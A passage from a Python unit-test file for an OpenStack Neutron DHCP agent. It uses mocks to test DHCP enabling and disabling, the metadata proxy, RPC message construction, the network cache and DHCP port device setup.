            self.external_process.assert_has_calls([
                mock.call(
                    cfg.CONF,
                    '12345678-1234-5678-1234567890ab',
                    'sudo',
                    'qdhcp-12345678-1234-5678-1234567890ab'),
                mock.call().enable(mock.ANY)
            ])
        else:
            self.assertFalse(self.external_process.call_count)
    def test_enable_dhcp_helper_enable_metadata_isolated_network(self):
        self._enable_dhcp_helper(isolated_network,
                                 enable_isolated_metadata=True,
                                 is_isolated_network=True)
    def test_enable_dhcp_helper_enable_metadata_no_gateway(self):
        isolated_network_no_gateway = copy.deepcopy(isolated_network)
        isolated_network_no_gateway.subnets[0].gateway_ip = None
        self._enable_dhcp_helper(isolated_network_no_gateway,
                                 enable_isolated_metadata=True,
                                 is_isolated_network=True)
    def test_enable_dhcp_helper_enable_metadata_nonisolated_network(self):
        nonisolated_network = copy.deepcopy(isolated_network)
        nonisolated_network.ports[0].device_owner = "network:router_interface"
        nonisolated_network.ports[0].fixed_ips[0].ip_address = '172.9.9.1'
        self._enable_dhcp_helper(nonisolated_network,
                                 enable_isolated_metadata=True,
                                 is_isolated_network=False)
    def test_enable_dhcp_helper_enable_metadata_empty_network(self):
        self._enable_dhcp_helper(empty_network,
                                 enable_isolated_metadata=True,
                                 is_isolated_network=True)
    def test_enable_dhcp_helper(self):
        self._enable_dhcp_helper(fake_network)
    def test_enable_dhcp_helper_down_network(self):
        self.plugin.get_network_info.return_value = fake_down_network
        self.dhcp.enable_dhcp_helper(fake_down_network.id)
        self.plugin.assert_has_calls(
            [mock.call.get_network_info(fake_down_network.id)])
        self.assertFalse(self.call_driver.called)
        self.assertFalse(self.cache.called)
        self.assertFalse(self.external_process.called)
    def test_enable_dhcp_helper_network_none(self):
        self.plugin.get_network_info.return_value = None
        with mock.patch.object(dhcp_agent.LOG, 'warn') as log:
            self.dhcp.enable_dhcp_helper('fake_id')
            self.plugin.assert_has_calls(
                [mock.call.get_network_info('fake_id')])
            self.assertFalse(self.call_driver.called)
            self.assertTrue(log.called)
            self.assertFalse(self.dhcp.schedule_resync.called)
    def test_enable_dhcp_helper_exception_during_rpc(self):
        self.plugin.get_network_info.side_effect = Exception
        with mock.patch.object(dhcp_agent.LOG, 'exception') as log:
            self.dhcp.enable_dhcp_helper(fake_network.id)
            self.plugin.assert_has_calls(
                [mock.call.get_network_info(fake_network.id)])
            self.assertFalse(self.call_driver.called)
            self.assertTrue(log.called)
            self.assertTrue(self.schedule_resync.called)
            self.assertFalse(self.cache.called)
            self.assertFalse(self.external_process.called)
    def test_enable_dhcp_helper_driver_failure(self):
        self.plugin.get_network_info.return_value = fake_network
        self.call_driver.return_value = False
        self.dhcp.enable_dhcp_helper(fake_network.id)
        self.plugin.assert_has_calls(
            [mock.call.get_network_info(fake_network.id)])
        self.call_driver.assert_called_once_with('enable', fake_network)
        self.assertFalse(self.cache.called)
        self.assertFalse(self.external_process.called)
    def _disable_dhcp_helper_known_network(self, isolated_metadata=False):
        if isolated_metadata:
            cfg.CONF.set_override('enable_isolated_metadata', True)
        self.cache.get_network_by_id.return_value = fake_network
        self.dhcp.disable_dhcp_helper(fake_network.id)
        self.cache.assert_has_calls(
            [mock.call.get_network_by_id(fake_network.id)])
        self.call_driver.assert_called_once_with('disable', fake_network)
        if isolated_metadata:
            self.external_process.assert_has_calls([
                mock.call(
                    cfg.CONF,
                    '12345678-1234-5678-1234567890ab',
                    'sudo',
                    'qdhcp-12345678-1234-5678-1234567890ab'),
                mock.call().disable()
            ])
        else:
            self.assertFalse(self.external_process.call_count)
    def test_disable_dhcp_helper_known_network_isolated_metadata(self):
        self._disable_dhcp_helper_known_network(isolated_metadata=True)
    def test_disable_dhcp_helper_known_network(self):
        self._disable_dhcp_helper_known_network()
    def test_disable_dhcp_helper_unknown_network(self):
        self.cache.get_network_by_id.return_value = None
        self.dhcp.disable_dhcp_helper('abcdef')
        self.cache.assert_has_calls(
            [mock.call.get_network_by_id('abcdef')])
        self.assertEqual(0, self.call_driver.call_count)
        self.assertFalse(self.external_process.called)
    def _disable_dhcp_helper_driver_failure(self, isolated_metadata=False):
        if isolated_metadata:
            cfg.CONF.set_override('enable_isolated_metadata', True)
        self.cache.get_network_by_id.return_value = fake_network
        self.call_driver.return_value = False
        self.dhcp.disable_dhcp_helper(fake_network.id)
        self.cache.assert_has_calls(
            [mock.call.get_network_by_id(fake_network.id)])
        self.call_driver.assert_called_once_with('disable', fake_network)
        self.cache.assert_has_calls(
            [mock.call.get_network_by_id(fake_network.id)])
        if isolated_metadata:
            self.external_process.assert_has_calls([
                mock.call(
                    cfg.CONF,
                    '12345678-1234-5678-1234567890ab',
                    'sudo',
                    'qdhcp-12345678-1234-5678-1234567890ab'),
                mock.call().disable()
            ])
        else:
            self.assertFalse(self.external_process.call_count)
    def test_disable_dhcp_helper_driver_failure_isolated_metadata(self):
        self._disable_dhcp_helper_driver_failure(isolated_metadata=True)
    def test_disable_dhcp_helper_driver_failure(self):
        self._disable_dhcp_helper_driver_failure()
    def test_enable_isolated_metadata_proxy(self):
        class_path = 'neutron.agent.linux.external_process.ProcessManager'
        with mock.patch(class_path) as ext_process:
            self.dhcp.enable_isolated_metadata_proxy(fake_network)
            ext_process.assert_has_calls([
                mock.call(
                    cfg.CONF,
                    '12345678-1234-5678-1234567890ab',
                    'sudo',
                    'qdhcp-12345678-1234-5678-1234567890ab'),
                mock.call().enable(mock.ANY)
            ])
    def test_disable_isolated_metadata_proxy(self):
        class_path = 'neutron.agent.linux.external_process.ProcessManager'
        with mock.patch(class_path) as ext_process:
            self.dhcp.disable_isolated_metadata_proxy(fake_network)
            ext_process.assert_has_calls([
                mock.call(
                    cfg.CONF,
                    '12345678-1234-5678-1234567890ab',
                    'sudo',
                    'qdhcp-12345678-1234-5678-1234567890ab'),
                mock.call().disable()
            ])
    def test_enable_isolated_metadata_proxy_with_metadata_network(self):
        cfg.CONF.set_override('enable_metadata_network', True)
        cfg.CONF.set_override('debug', True)
        cfg.CONF.set_override('verbose', False)
        cfg.CONF.set_override('log_file', 'test.log')
        class_path = 'neutron.agent.linux.ip_lib.IPWrapper'
        self.external_process_p.stop()
        # Ensure the mock is restored if this test fail
        try:
            with mock.patch(class_path) as ip_wrapper:
                self.dhcp.enable_isolated_metadata_proxy(fake_meta_network)
                ip_wrapper.assert_has_calls([mock.call(
                    'sudo',
                    'qdhcp-12345678-1234-5678-1234567890ab'),
                    mock.call().netns.execute([
                        'neutron-ns-metadata-proxy',
                        mock.ANY,
                        mock.ANY,
                        '--router_id=forzanapoli',
                        mock.ANY,
                        mock.ANY,
                        '--debug',
                        ('--log-file=neutron-ns-metadata-proxy-%s.log' %
                         fake_meta_network.id)], addl_env=None)
                ])
        finally:
            self.external_process_p.start()
    def test_network_create_end(self):
        payload = dict(network=dict(id=fake_network.id))
        with mock.patch.object(self.dhcp, 'enable_dhcp_helper') as enable:
            self.dhcp.network_create_end(None, payload)
            # BUG FIX: ``assertCalledOnceWith`` is not a Mock method — Mock
            # auto-creates unknown attributes, so the old assertion was a
            # silent no-op.  Use the real assert_called_once_with.
            enable.assert_called_once_with(fake_network.id)
    def test_network_update_end_admin_state_up(self):
        payload = dict(network=dict(id=fake_network.id, admin_state_up=True))
        with mock.patch.object(self.dhcp, 'enable_dhcp_helper') as enable:
            self.dhcp.network_update_end(None, payload)
            enable.assert_called_once_with(fake_network.id)
    def test_network_update_end_admin_state_down(self):
        payload = dict(network=dict(id=fake_network.id, admin_state_up=False))
        with mock.patch.object(self.dhcp, 'disable_dhcp_helper') as disable:
            self.dhcp.network_update_end(None, payload)
            disable.assert_called_once_with(fake_network.id)
    def test_network_delete_end(self):
        payload = dict(network_id=fake_network.id)
        with mock.patch.object(self.dhcp, 'disable_dhcp_helper') as disable:
            self.dhcp.network_delete_end(None, payload)
            disable.assert_called_once_with(fake_network.id)
    def test_refresh_dhcp_helper_no_dhcp_enabled_networks(self):
        network = dhcp.NetModel(True, dict(id='net-id',
                                tenant_id='aaaaaaaa-aaaa-aaaa-aaaaaaaaaaaa',
                                admin_state_up=True,
                                subnets=[],
                                ports=[]))
        self.cache.get_network_by_id.return_value = network
        self.plugin.get_network_info.return_value = network
        with mock.patch.object(self.dhcp, 'disable_dhcp_helper') as disable:
            self.dhcp.refresh_dhcp_helper(network.id)
            disable.assert_called_once_with(network.id)
            self.assertFalse(self.cache.called)
            self.assertFalse(self.call_driver.called)
            self.cache.assert_has_calls(
                [mock.call.get_network_by_id('net-id')])
    def test_refresh_dhcp_helper_exception_during_rpc(self):
        network = dhcp.NetModel(True, dict(id='net-id',
                                tenant_id='aaaaaaaa-aaaa-aaaa-aaaaaaaaaaaa',
                                admin_state_up=True,
                                subnets=[],
                                ports=[]))
        self.cache.get_network_by_id.return_value = network
        self.plugin.get_network_info.side_effect = Exception
        with mock.patch.object(dhcp_agent.LOG, 'exception') as log:
            self.dhcp.refresh_dhcp_helper(network.id)
            self.assertFalse(self.call_driver.called)
            self.cache.assert_has_calls(
                [mock.call.get_network_by_id('net-id')])
            self.assertTrue(log.called)
            self.assertTrue(self.dhcp.schedule_resync.called)
    def test_subnet_update_end(self):
        payload = dict(subnet=dict(network_id=fake_network.id))
        self.cache.get_network_by_id.return_value = fake_network
        self.plugin.get_network_info.return_value = fake_network
        self.dhcp.subnet_update_end(None, payload)
        self.cache.assert_has_calls([mock.call.put(fake_network)])
        self.call_driver.assert_called_once_with('reload_allocations',
                                                 fake_network)
    def test_subnet_update_end_restart(self):
        new_state = dhcp.NetModel(True, dict(id=fake_network.id,
                                  tenant_id=fake_network.tenant_id,
                                  admin_state_up=True,
                                  subnets=[fake_subnet1, fake_subnet3],
                                  ports=[fake_port1]))
        payload = dict(subnet=dict(network_id=fake_network.id))
        self.cache.get_network_by_id.return_value = fake_network
        self.plugin.get_network_info.return_value = new_state
        self.dhcp.subnet_update_end(None, payload)
        self.cache.assert_has_calls([mock.call.put(new_state)])
        self.call_driver.assert_called_once_with('restart',
                                                 new_state)
    def test_subnet_update_end_delete_payload(self):
        prev_state = dhcp.NetModel(True, dict(id=fake_network.id,
                                   tenant_id=fake_network.tenant_id,
                                   admin_state_up=True,
                                   subnets=[fake_subnet1, fake_subnet3],
                                   ports=[fake_port1]))
        payload = dict(subnet_id=fake_subnet1.id)
        self.cache.get_network_by_subnet_id.return_value = prev_state
        self.cache.get_network_by_id.return_value = prev_state
        self.plugin.get_network_info.return_value = fake_network
        self.dhcp.subnet_delete_end(None, payload)
        self.cache.assert_has_calls([
            mock.call.get_network_by_subnet_id(
                'bbbbbbbb-bbbb-bbbb-bbbbbbbbbbbb'),
            mock.call.get_network_by_id('12345678-1234-5678-1234567890ab'),
            mock.call.put(fake_network)])
        self.call_driver.assert_called_once_with('restart',
                                                 fake_network)
    def test_port_update_end(self):
        payload = dict(port=fake_port2)
        self.cache.get_network_by_id.return_value = fake_network
        self.cache.get_port_by_id.return_value = fake_port2
        self.dhcp.port_update_end(None, payload)
        self.cache.assert_has_calls(
            [mock.call.get_network_by_id(fake_port2.network_id),
             mock.call.put_port(mock.ANY)])
        self.call_driver.assert_called_once_with('reload_allocations',
                                                 fake_network)
    def test_port_update_change_ip_on_port(self):
        payload = dict(port=fake_port1)
        self.cache.get_network_by_id.return_value = fake_network
        updated_fake_port1 = copy.deepcopy(fake_port1)
        updated_fake_port1.fixed_ips[0].ip_address = '172.9.9.99'
        self.cache.get_port_by_id.return_value = updated_fake_port1
        self.dhcp.port_update_end(None, payload)
        self.cache.assert_has_calls(
            [mock.call.get_network_by_id(fake_port1.network_id),
             mock.call.put_port(mock.ANY)])
        self.call_driver.assert_has_calls(
            [mock.call.call_driver('reload_allocations', fake_network)])
    def test_port_delete_end(self):
        payload = dict(port_id=fake_port2.id)
        self.cache.get_network_by_id.return_value = fake_network
        self.cache.get_port_by_id.return_value = fake_port2
        self.dhcp.port_delete_end(None, payload)
        self.cache.assert_has_calls(
            [mock.call.get_port_by_id(fake_port2.id),
             mock.call.get_network_by_id(fake_network.id),
             mock.call.remove_port(fake_port2)])
        self.call_driver.assert_has_calls(
            [mock.call.call_driver('reload_allocations', fake_network)])
    def test_port_delete_end_unknown_port(self):
        payload = dict(port_id='unknown')
        self.cache.get_port_by_id.return_value = None
        self.dhcp.port_delete_end(None, payload)
        self.cache.assert_has_calls([mock.call.get_port_by_id('unknown')])
        self.assertEqual(self.call_driver.call_count, 0)
class TestDhcpPluginApiProxy(base.BaseTestCase):
    """Tests for the DhcpPluginApi RPC proxy.

    ``call`` and ``make_msg`` are patched, so each test verifies only that
    the proxy builds the right message (method name + kwargs, always
    including ``host``) and returns/forwards the call result.
    """
    def setUp(self):
        super(TestDhcpPluginApiProxy, self).setUp()
        self.proxy = dhcp_agent.DhcpPluginApi('foo', {}, None)
        self.proxy.host = 'foo'
        self.call_p = mock.patch.object(self.proxy, 'call')
        self.call = self.call_p.start()
        self.make_msg_p = mock.patch.object(self.proxy, 'make_msg')
        self.make_msg = self.make_msg_p.start()
    def test_get_network_info(self):
        self.call.return_value = dict(a=1)
        retval = self.proxy.get_network_info('netid')
        # The proxy wraps the returned dict so keys become attributes.
        self.assertEqual(retval.a, 1)
        self.assertTrue(self.call.called)
        self.make_msg.assert_called_once_with('get_network_info',
                                              network_id='netid',
                                              host='foo')
    def test_get_dhcp_port(self):
        self.call.return_value = dict(a=1)
        retval = self.proxy.get_dhcp_port('netid', 'devid')
        self.assertEqual(retval.a, 1)
        self.assertTrue(self.call.called)
        self.make_msg.assert_called_once_with('get_dhcp_port',
                                              network_id='netid',
                                              device_id='devid',
                                              host='foo')
    def test_get_dhcp_port_none(self):
        # A None RPC result must not be wrapped — it is passed through.
        self.call.return_value = None
        self.assertIsNone(self.proxy.get_dhcp_port('netid', 'devid'))
    def test_get_active_networks_info(self):
        self.proxy.get_active_networks_info()
        self.make_msg.assert_called_once_with('get_active_networks_info',
                                              host='foo')
    def test_create_dhcp_port(self):
        port_body = (
            {'port':
                {'name': '', 'admin_state_up': True,
                 'network_id': fake_network.id,
                 'tenant_id': fake_network.tenant_id,
                 'fixed_ips': [{'subnet_id': fake_fixed_ip1.subnet_id}],
                 'device_id': mock.ANY}})
        self.proxy.create_dhcp_port(port_body)
        self.make_msg.assert_called_once_with('create_dhcp_port',
                                              port=port_body,
                                              host='foo')
    def test_create_dhcp_port_none(self):
        self.call.return_value = None
        port_body = (
            {'port':
                {'name': '', 'admin_state_up': True,
                 'network_id': fake_network.id,
                 'tenant_id': fake_network.tenant_id,
                 'fixed_ips': [{'subnet_id': fake_fixed_ip1.subnet_id}],
                 'device_id': mock.ANY}})
        self.assertIsNone(self.proxy.create_dhcp_port(port_body))
    def test_update_dhcp_port_none(self):
        self.call.return_value = None
        port_body = {'port': {'fixed_ips':
                              [{'subnet_id': fake_fixed_ip1.subnet_id}]}}
        self.assertIsNone(self.proxy.update_dhcp_port(fake_port1.id,
                                                      port_body))
    def test_update_dhcp_port(self):
        port_body = {'port': {'fixed_ips':
                              [{'subnet_id': fake_fixed_ip1.subnet_id}]}}
        self.proxy.update_dhcp_port(fake_port1.id, port_body)
        self.make_msg.assert_called_once_with('update_dhcp_port',
                                              port_id=fake_port1.id,
                                              port=port_body,
                                              host='foo')
    def test_release_dhcp_port(self):
        self.proxy.release_dhcp_port('netid', 'devid')
        self.assertTrue(self.call.called)
        self.make_msg.assert_called_once_with('release_dhcp_port',
                                              network_id='netid',
                                              device_id='devid',
                                              host='foo')
    def test_release_port_fixed_ip(self):
        self.proxy.release_port_fixed_ip('netid', 'devid', 'subid')
        self.assertTrue(self.call.called)
        self.make_msg.assert_called_once_with('release_port_fixed_ip',
                                              network_id='netid',
                                              subnet_id='subid',
                                              device_id='devid',
                                              host='foo')
class TestNetworkCache(base.BaseTestCase):
    """Exercise NetworkCache's primary cache and its two lookup indexes.

    The cache maps network id -> network, while ``subnet_lookup`` and
    ``port_lookup`` map subnet/port ids back to their network id.
    """
    def test_put_network(self):
        nc = dhcp_agent.NetworkCache()
        nc.put(fake_network)
        self.assertEqual(nc.cache,
                         {fake_network.id: fake_network})
        self.assertEqual(nc.subnet_lookup,
                         {fake_subnet1.id: fake_network.id,
                          fake_subnet2.id: fake_network.id})
        self.assertEqual(nc.port_lookup,
                         {fake_port1.id: fake_network.id})
    def test_put_network_existing(self):
        # Re-putting an already cached network must first remove the old
        # entry so stale lookup-table rows do not linger.
        prev_network_info = mock.Mock()
        nc = dhcp_agent.NetworkCache()
        with mock.patch.object(nc, 'remove') as remove:
            nc.cache[fake_network.id] = prev_network_info
            nc.put(fake_network)
        remove.assert_called_once_with(prev_network_info)
        self.assertEqual(nc.cache,
                         {fake_network.id: fake_network})
        self.assertEqual(nc.subnet_lookup,
                         {fake_subnet1.id: fake_network.id,
                          fake_subnet2.id: fake_network.id})
        self.assertEqual(nc.port_lookup,
                         {fake_port1.id: fake_network.id})
    def test_remove_network(self):
        nc = dhcp_agent.NetworkCache()
        nc.cache = {fake_network.id: fake_network}
        nc.subnet_lookup = {fake_subnet1.id: fake_network.id,
                            fake_subnet2.id: fake_network.id}
        nc.port_lookup = {fake_port1.id: fake_network.id}
        nc.remove(fake_network)
        # remove() must clear the main cache and both lookup tables.
        self.assertEqual(len(nc.cache), 0)
        self.assertEqual(len(nc.subnet_lookup), 0)
        self.assertEqual(len(nc.port_lookup), 0)
    def test_get_network_by_id(self):
        nc = dhcp_agent.NetworkCache()
        nc.put(fake_network)
        self.assertEqual(nc.get_network_by_id(fake_network.id), fake_network)
    def test_get_network_ids(self):
        nc = dhcp_agent.NetworkCache()
        nc.put(fake_network)
        self.assertEqual(nc.get_network_ids(), [fake_network.id])
    def test_get_network_by_subnet_id(self):
        nc = dhcp_agent.NetworkCache()
        nc.put(fake_network)
        self.assertEqual(nc.get_network_by_subnet_id(fake_subnet1.id),
                         fake_network)
    def test_get_network_by_port_id(self):
        nc = dhcp_agent.NetworkCache()
        nc.put(fake_network)
        self.assertEqual(nc.get_network_by_port_id(fake_port1.id),
                         fake_network)
    def test_put_port(self):
        fake_net = dhcp.NetModel(
            True, dict(id='12345678-1234-5678-1234567890ab',
                       tenant_id='aaaaaaaa-aaaa-aaaa-aaaaaaaaaaaa',
                       subnets=[fake_subnet1],
                       ports=[fake_port1]))
        nc = dhcp_agent.NetworkCache()
        nc.put(fake_net)
        nc.put_port(fake_port2)
        # The new port is indexed and appended to the network's port list.
        self.assertEqual(len(nc.port_lookup), 2)
        self.assertIn(fake_port2, fake_net.ports)
    def test_put_port_existing(self):
        # Putting a port that is already present must not duplicate it.
        fake_net = dhcp.NetModel(
            True, dict(id='12345678-1234-5678-1234567890ab',
                       tenant_id='aaaaaaaa-aaaa-aaaa-aaaaaaaaaaaa',
                       subnets=[fake_subnet1],
                       ports=[fake_port1, fake_port2]))
        nc = dhcp_agent.NetworkCache()
        nc.put(fake_net)
        nc.put_port(fake_port2)
        self.assertEqual(len(nc.port_lookup), 2)
        self.assertIn(fake_port2, fake_net.ports)
    def test_remove_port_existing(self):
        fake_net = dhcp.NetModel(
            True, dict(id='12345678-1234-5678-1234567890ab',
                       tenant_id='aaaaaaaa-aaaa-aaaa-aaaaaaaaaaaa',
                       subnets=[fake_subnet1],
                       ports=[fake_port1, fake_port2]))
        nc = dhcp_agent.NetworkCache()
        nc.put(fake_net)
        nc.remove_port(fake_port2)
        self.assertEqual(len(nc.port_lookup), 1)
        self.assertNotIn(fake_port2, fake_net.ports)
    def test_get_port_by_id(self):
        nc = dhcp_agent.NetworkCache()
        nc.put(fake_network)
        self.assertEqual(nc.get_port_by_id(fake_port1.id), fake_port1)
class FakePort1:
    """Minimal port stand-in exposing only an id."""
    id = 'eeeeeeee-eeee-eeee-eeee-eeeeeeeeeeee'
class FakeV4Subnet:
    """IPv4 subnet fixture with DHCP enabled and a gateway."""
    id = 'dddddddd-dddd-dddd-dddd-dddddddddddd'
    ip_version = 4
    cidr = '192.168.0.0/24'
    gateway_ip = '192.168.0.1'
    enable_dhcp = True
class FakeV4SubnetNoGateway:
    """IPv4 subnet fixture with DHCP enabled but no gateway."""
    id = 'eeeeeeee-eeee-eeee-eeee-eeeeeeeeeeee'
    ip_version = 4
    cidr = '192.168.1.0/24'
    gateway_ip = None
    enable_dhcp = True
class FakeV4Network:
    """Network fixture with one gatewayed subnet and one port."""
    id = 'aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa'
    subnets = [FakeV4Subnet()]
    ports = [FakePort1()]
    namespace = 'qdhcp-aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa'
class FakeV4NetworkNoSubnet:
    """Network fixture with no subnets and no ports."""
    id = 'aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa'
    subnets = []
    ports = []
class FakeV4NetworkNoGateway:
    """Network fixture whose only subnet has no gateway."""
    id = 'cccccccc-cccc-cccc-cccc-cccccccccccc'
    subnets = [FakeV4SubnetNoGateway()]
    ports = [FakePort1()]
class TestDeviceManager(base.BaseTestCase):
    """Tests for dhcp.DeviceManager: DHCP port setup, teardown and the
    default-route management performed on the DHCP namespace device.

    The interface driver and ip_lib helpers are mocked out, so the tests
    assert on the calls the manager makes rather than on real devices.
    """
    def setUp(self):
        super(TestDeviceManager, self).setUp()
        config.register_interface_driver_opts_helper(cfg.CONF)
        config.register_use_namespaces_opts_helper(cfg.CONF)
        cfg.CONF.register_opts(dhcp_agent.DhcpAgent.OPTS)
        cfg.CONF.register_opts(dhcp.OPTS)
        cfg.CONF.set_override('interface_driver',
                              'neutron.agent.linux.interface.NullDriver')
        config.register_root_helper(cfg.CONF)
        cfg.CONF.set_override('use_namespaces', True)
        cfg.CONF.set_override('enable_isolated_metadata', True)
        self.ensure_device_is_ready_p = mock.patch(
            'neutron.agent.linux.ip_lib.ensure_device_is_ready')
        self.ensure_device_is_ready = (self.ensure_device_is_ready_p.start())
        self.dvr_cls_p = mock.patch('neutron.agent.linux.interface.NullDriver')
        self.iproute_cls_p = mock.patch('neutron.agent.linux.'
                                        'ip_lib.IpRouteCommand')
        driver_cls = self.dvr_cls_p.start()
        iproute_cls = self.iproute_cls_p.start()
        self.mock_driver = mock.MagicMock()
        self.mock_driver.DEV_NAME_LEN = (
            interface.LinuxInterfaceDriver.DEV_NAME_LEN)
        self.mock_iproute = mock.MagicMock()
        driver_cls.return_value = self.mock_driver
        iproute_cls.return_value = self.mock_iproute
    def _test_setup_helper(self, device_is_ready, net=None, port=None):
        """Run DeviceManager.setup() and assert the driver call sequence.

        When the tap device is not ready yet, an extra plug() call is
        expected between get_device_name() and init_l3().
        """
        net = net or fake_network
        port = port or fake_port1
        plugin = mock.Mock()
        # NOTE: 'port or fake_port1' is redundant here -- port was already
        # defaulted two lines above.
        plugin.create_dhcp_port.return_value = port or fake_port1
        plugin.get_dhcp_port.return_value = port or fake_port1
        self.ensure_device_is_ready.return_value = device_is_ready
        self.mock_driver.get_device_name.return_value = 'tap12345678-12'
        dh = dhcp.DeviceManager(cfg.CONF, cfg.CONF.root_helper, plugin)
        dh._set_default_route = mock.Mock()
        interface_name = dh.setup(net)
        self.assertEqual(interface_name, 'tap12345678-12')
        plugin.assert_has_calls([
            mock.call.create_dhcp_port(
                {'port': {'name': '', 'admin_state_up': True,
                          'network_id': net.id, 'tenant_id': net.tenant_id,
                          'fixed_ips':
                          [{'subnet_id': fake_fixed_ip1.subnet_id}],
                          'device_id': mock.ANY}})])
        # 169.254.169.254/16 is expected because enable_isolated_metadata
        # is overridden to True in setUp().
        expected_ips = ['172.9.9.9/24', '169.254.169.254/16']
        expected = [
            mock.call.get_device_name(port),
            mock.call.init_l3(
                'tap12345678-12',
                expected_ips,
                namespace=net.namespace)]
        if not device_is_ready:
            expected.insert(1,
                            mock.call.plug(net.id,
                                           port.id,
                                           'tap12345678-12',
                                           'aa:bb:cc:dd:ee:ff',
                                           namespace=net.namespace))
        self.mock_driver.assert_has_calls(expected)
        dh._set_default_route.assert_called_once_with(net, 'tap12345678-12')
    def test_setup(self):
        cfg.CONF.set_override('enable_metadata_network', False)
        self._test_setup_helper(False)
        cfg.CONF.set_override('enable_metadata_network', True)
        self._test_setup_helper(False)
    def test_setup_device_is_ready(self):
        self._test_setup_helper(True)
    def test_create_dhcp_port_raise_conflict(self):
        # A None result from the plugin signals the port already exists.
        plugin = mock.Mock()
        dh = dhcp.DeviceManager(cfg.CONF, cfg.CONF.root_helper, plugin)
        plugin.create_dhcp_port.return_value = None
        self.assertRaises(exceptions.Conflict,
                          dh.setup_dhcp_port,
                          fake_network)
    def test_create_dhcp_port_create_new(self):
        plugin = mock.Mock()
        dh = dhcp.DeviceManager(cfg.CONF, cfg.CONF.root_helper, plugin)
        plugin.create_dhcp_port.return_value = fake_network.ports[0]
        dh.setup_dhcp_port(fake_network)
        plugin.assert_has_calls([
            mock.call.create_dhcp_port(
                {'port': {'name': '', 'admin_state_up': True,
                          'network_id':
                          fake_network.id, 'tenant_id': fake_network.tenant_id,
                          'fixed_ips':
                          [{'subnet_id': fake_fixed_ip1.subnet_id}],
                          'device_id': mock.ANY}})])
    def test_create_dhcp_port_update_add_subnet(self):
        # Enabling DHCP on a second subnet should extend the existing
        # DHCP port's fixed_ips via update_dhcp_port.
        plugin = mock.Mock()
        dh = dhcp.DeviceManager(cfg.CONF, cfg.CONF.root_helper, plugin)
        fake_network_copy = copy.deepcopy(fake_network)
        fake_network_copy.ports[0].device_id = dh.get_device_id(fake_network)
        fake_network_copy.subnets[1].enable_dhcp = True
        plugin.update_dhcp_port.return_value = fake_network.ports[0]
        dh.setup_dhcp_port(fake_network_copy)
        port_body = {'port': {
            'network_id': fake_network.id,
            'fixed_ips': [{'subnet_id': fake_fixed_ip1.subnet_id,
                           'ip_address': fake_fixed_ip1.ip_address},
                          {'subnet_id': fake_subnet2.id}]}}
        plugin.assert_has_calls([
            mock.call.update_dhcp_port(fake_network_copy.ports[0].id,
                                       port_body)])
    def test_update_dhcp_port_raises_conflict(self):
        plugin = mock.Mock()
        dh = dhcp.DeviceManager(cfg.CONF, cfg.CONF.root_helper, plugin)
        fake_network_copy = copy.deepcopy(fake_network)
        fake_network_copy.ports[0].device_id = dh.get_device_id(fake_network)
        fake_network_copy.subnets[1].enable_dhcp = True
        plugin.update_dhcp_port.return_value = None
        self.assertRaises(exceptions.Conflict,
                          dh.setup_dhcp_port,
                          fake_network_copy)
    def test_create_dhcp_port_no_update_or_create(self):
        # A port already owned by this agent with up-to-date fixed_ips
        # should trigger neither a create nor an update.
        plugin = mock.Mock()
        dh = dhcp.DeviceManager(cfg.CONF, cfg.CONF.root_helper, plugin)
        fake_network_copy = copy.deepcopy(fake_network)
        fake_network_copy.ports[0].device_id = dh.get_device_id(fake_network)
        dh.setup_dhcp_port(fake_network_copy)
        self.assertFalse(plugin.setup_dhcp_port.called)
        self.assertFalse(plugin.update_dhcp_port.called)
    def test_destroy(self):
        fake_net = dhcp.NetModel(
            True, dict(id='12345678-1234-5678-1234567890ab',
                       tenant_id='aaaaaaaa-aaaa-aaaa-aaaaaaaaaaaa'))
        fake_port = dhcp.DictModel(
            dict(id='12345678-1234-aaaa-1234567890ab',
                 mac_address='aa:bb:cc:dd:ee:ff'))
        with mock.patch('neutron.agent.linux.interface.NullDriver') as dvr_cls:
            mock_driver = mock.MagicMock()
            mock_driver.get_device_name.return_value = 'tap12345678-12'
            dvr_cls.return_value = mock_driver
            plugin = mock.Mock()
            plugin.get_dhcp_port.return_value = fake_port
            dh = dhcp.DeviceManager(cfg.CONF, cfg.CONF.root_helper, plugin)
            dh.destroy(fake_net, 'tap12345678-12')
            # destroy() must unplug the tap device and release the port.
            dvr_cls.assert_called_once_with(cfg.CONF)
            mock_driver.assert_has_calls(
                [mock.call.unplug('tap12345678-12',
                                  namespace='qdhcp-' + fake_net.id)])
            plugin.assert_has_calls(
                [mock.call.release_dhcp_port(fake_net.id, mock.ANY)])
    def test_get_interface_name(self):
        fake_net = dhcp.NetModel(
            True, dict(id='12345678-1234-5678-1234567890ab',
                       tenant_id='aaaaaaaa-aaaa-aaaa-aaaaaaaaaaaa'))
        fake_port = dhcp.DictModel(
            dict(id='12345678-1234-aaaa-1234567890ab',
                 mac_address='aa:bb:cc:dd:ee:ff'))
        with mock.patch('neutron.agent.linux.interface.NullDriver') as dvr_cls:
            mock_driver = mock.MagicMock()
            mock_driver.get_device_name.return_value = 'tap12345678-12'
            dvr_cls.return_value = mock_driver
            plugin = mock.Mock()
            plugin.get_dhcp_port.return_value = fake_port
            dh = dhcp.DeviceManager(cfg.CONF, cfg.CONF.root_helper, plugin)
            dh.get_interface_name(fake_net, fake_port)
            dvr_cls.assert_called_once_with(cfg.CONF)
            mock_driver.assert_has_calls(
                [mock.call.get_device_name(fake_port)])
            # Resolving the name must not hit the plugin at all.
            self.assertEqual(len(plugin.mock_calls), 0)
    def test_get_device_id(self):
        fake_net = dhcp.NetModel(
            True, dict(id='12345678-1234-5678-1234567890ab',
                       tenant_id='aaaaaaaa-aaaa-aaaa-aaaaaaaaaaaa'))
        # device_id format: 'dhcp<host-uuid>-<network-id>'.
        expected = ('dhcp1ae5f96c-c527-5079-82ea-371a01645457-12345678-1234-'
                    '5678-1234567890ab')
        with mock.patch('uuid.uuid5') as uuid5:
            uuid5.return_value = '1ae5f96c-c527-5079-82ea-371a01645457'
            dh = dhcp.DeviceManager(cfg.CONF, cfg.CONF.root_helper, None)
            uuid5.called_once_with(uuid.NAMESPACE_DNS, cfg.CONF.host)
            self.assertEqual(dh.get_device_id(fake_net), expected)
    def test_update(self):
        # Try with namespaces and no metadata network
        cfg.CONF.set_override('use_namespaces', True)
        cfg.CONF.set_override('enable_metadata_network', False)
        dh = dhcp.DeviceManager(cfg.CONF, cfg.CONF.root_helper, None)
        dh._set_default_route = mock.Mock()
